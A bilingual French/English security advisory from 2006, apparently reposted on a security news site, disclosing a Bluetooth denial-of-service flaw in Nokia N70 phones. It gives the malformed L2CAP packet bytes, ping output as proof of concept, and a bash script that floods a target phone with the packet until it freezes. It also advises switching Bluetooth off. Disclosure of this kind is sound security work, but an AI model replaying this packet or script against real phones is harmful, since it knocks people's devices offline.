Résumé : Un deuxième type de Déni de Service a été identifié sur le modèle N70 des téléphones portables de la marque Nokia. Cette faille, trouvée à l'aide de Bluetooth Stack Smasher, permet de rendre inutilisable ce type de téléphones. -
Lire l'article
[Version francaise] -
[English version]
La plupart des téléphones mobiles de la marque Nokia sont vendus avec des fonctions Bluetooth. Ces fonctions ne sont pas activées par défaut.
Plus d'informations sur les téléphones de cette marque sur
lien
L'envoi de paquets malformés peut provoquer sur les modèles n70 de la marque un Déni de Service (DoS) au minimum, cette faille a été trouvée avec l'utilitaire de fuzzing Bluetooth Stack Smasher v0.6 (cf. nouvelle version BSS 0.8 sur
lien ).
Lors de la réception de nombreux paquets malformés de type L2CAP, le téléphone cellulaire Nokia n70 peut voir son activité ralentie puis figée (freeze) au bout d'une période de 30 secondes environ. La seule manière de reprendre la main étant alors de stopper le téléphone via le bouton d'arrêt/démarrage qui se fait surement par l'envoi d'une interruption RT.
Le paquet L2CAP responsable du DoS est le suivant :
7D AF 00 00 41 41 41
Avec :
Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)
0x41 représentant les octects de remplissage aléatoire (padding)
D'autres modèles de la marque Nokia peuvent être affectés, ils doivent être testés avec l'utilitaire de fuzzing précédemment cité BSS.
Aucune mise à jour du "Firmware" (logiciel embarqué) n'est disponible pour le moment, la seule solution envisageable est de désactiver les fonctions Bluetooth lorsque vous n'en avez pas besoin.
Un nouveau "Firmware" sera peut être mis à disposition par le constructeur sous peu.
Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss
# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)
# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss
Loop.sh étant le suivant :
#!/bin/bash
# Another Nokia N70 Bluetooth remote Denial of Service
# Pierre Betouin pierre.betouin@infratech.fr
# Feb 14 11:21:58 GMT+1 2006
echo "Another Nokia N70 Bluetooth remote Denial of Service"
echo "Pierre Betouin pierre.betouin@infratech.fr"
echo ""
if (( $# < 1 )); then
echo "Usage: $0 <btdaddr> (uses replay_l2cap_packet_nokiaN70)"
exit
fi
if [ -x ./replay_l2cap_packet_nokiaN70 ]; then
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"
echo ""
read
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)
./replay_l2cap_packet_nokiaN70 $1
done
else
echo "You must compile replay_l2cap_packet_nokiaN70 before"
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"
exit
fi
Vous pouvez télécharger replay_l2cap_packet_nokiaN70.c sur
lien
Autres ressources sur la sécurité Bluetooth :
[Dossier Sécurité Bluetooth - partie 1] Introduction aux technologies Bluetooth
lien
[Dossier Sécurité Bluetooth - partie 2] Présentation des utilitaires Bluetooth
lien
[Dossier Sécurité Bluetooth - partie 3] Les attaques génériques
lien
[Dossier Sécurité Bluetooth - partie 4] Les attaques d'implémentations
lien
[Dossier Sécurité Bluetooth - partie 5] Scénarios possibles & synthèse
lien
[Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson
lien
[Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson
lien
[Infratech - vulnérabilité] PoC pour le DoS sur hcidump
lien
[Infratech - vulnérabilité] Déni de Service sur hcidump
lien
[Infratech - release] BSS - Bluetooth Stack Smasher v0.6
lien
[Infratech - vulnérabilité] Déni de Service sur Nokia N70
lien
[English Version] -
[Version francaise]
Most of Nokia cell phones sold now are Bluetooth compliant. Bluetooth is not enabled by default.
Lots of users use it with several other devices (earsets, GPS systems, and so on).
More information about these devices on
lien
Bluetooth technology uses at the lowest level a L2CAP layer for multiplexing and "access to media" purposes.
Other upper protocols, such as RFCOMM or SDP, use it for instance.
Malformed packets can lead to, at least, a denial of service on affected devices. This flaw was found using the BSS tool ( Bluetooth Stack Smasher new release v0.8 :
lien ).
When receiving numerous short buggy L2CAP packets, Nokia N70 cellular phones begin to be slower and then freeze after a short period (within 30 seconds). The only available button is the "halt button" located at the top of the phone (maybe controlled by a RT interruption) which allows users to shut down their device.
L2CAP packets responsible of the crash are :
7D AF 00 00 41 41 41
Where:
Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)
0x41 bytes are random padding.
Other Nokia devices may be affected and should be tested with BSS fuzzer. Solution is to switch off bluetooth on the phone. A firmware upgrade may be distributed later by Nokia.
Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss
# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)
# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss
Loop.sh as follows :
#!/bin/bash
# Another Nokia N70 Bluetooth remote Denial of Service
# Pierre Betouin pierre.betouin@infratech.fr
# Feb 14 11:21:58 GMT+1 2006
echo "Another Nokia N70 Bluetooth remote Denial of Service"
echo "Pierre Betouin pierre.betouin@infratech.fr"
echo ""
if (( $# < 1 )); then
echo "Usage: $0 <btdaddr> (uses replay_l2cap_packet_nokiaN70)"
exit
fi
if [ -x ./replay_l2cap_packet_nokiaN70 ]; then
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"
echo ""
read
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)
./replay_l2cap_packet_nokiaN70 $1
done
else
echo "You must compile replay_l2cap_packet_nokiaN70 before"
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"
exit
fi
You can download replay_l2cap_packet_nokiaN70.c on
lien
Author Website on
lien
- Article suivant : [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Article précédent : [Infratech - vulnérabilité] Déni de Service sur NOKIA N70
- Article suivant dans la catégorie Failles : [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Article précédent dans la catégorie Failles : [Infratech - vulnérabilité] Déni de Service sur NOKIA N70
| Mini-Tagwall des articles publiés sur SecuObs : | |
| |
sécurité, exploit, windows, outil, attaque, réseau, microsoft, metasploit, audit, vulnérabilité, système, virus, internet, usbsploit, données, protocol, présentation, linux, source, réseaux, bluetooth, scanner, reverse, conférence, shell, meterpreter, vista, rootkit, engineering, mobile, security, wishmaster, malicieux, https, trames, paquet, noyau, téléphone, détection, botnet, forensic, libre, snort, utilisant, sysun |
| Mini-Tagwall de l'annuaire video : | |
| |
curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
| Mini-Tagwall des articles de la revue de presse : | |
| |
security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | |
| |
security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
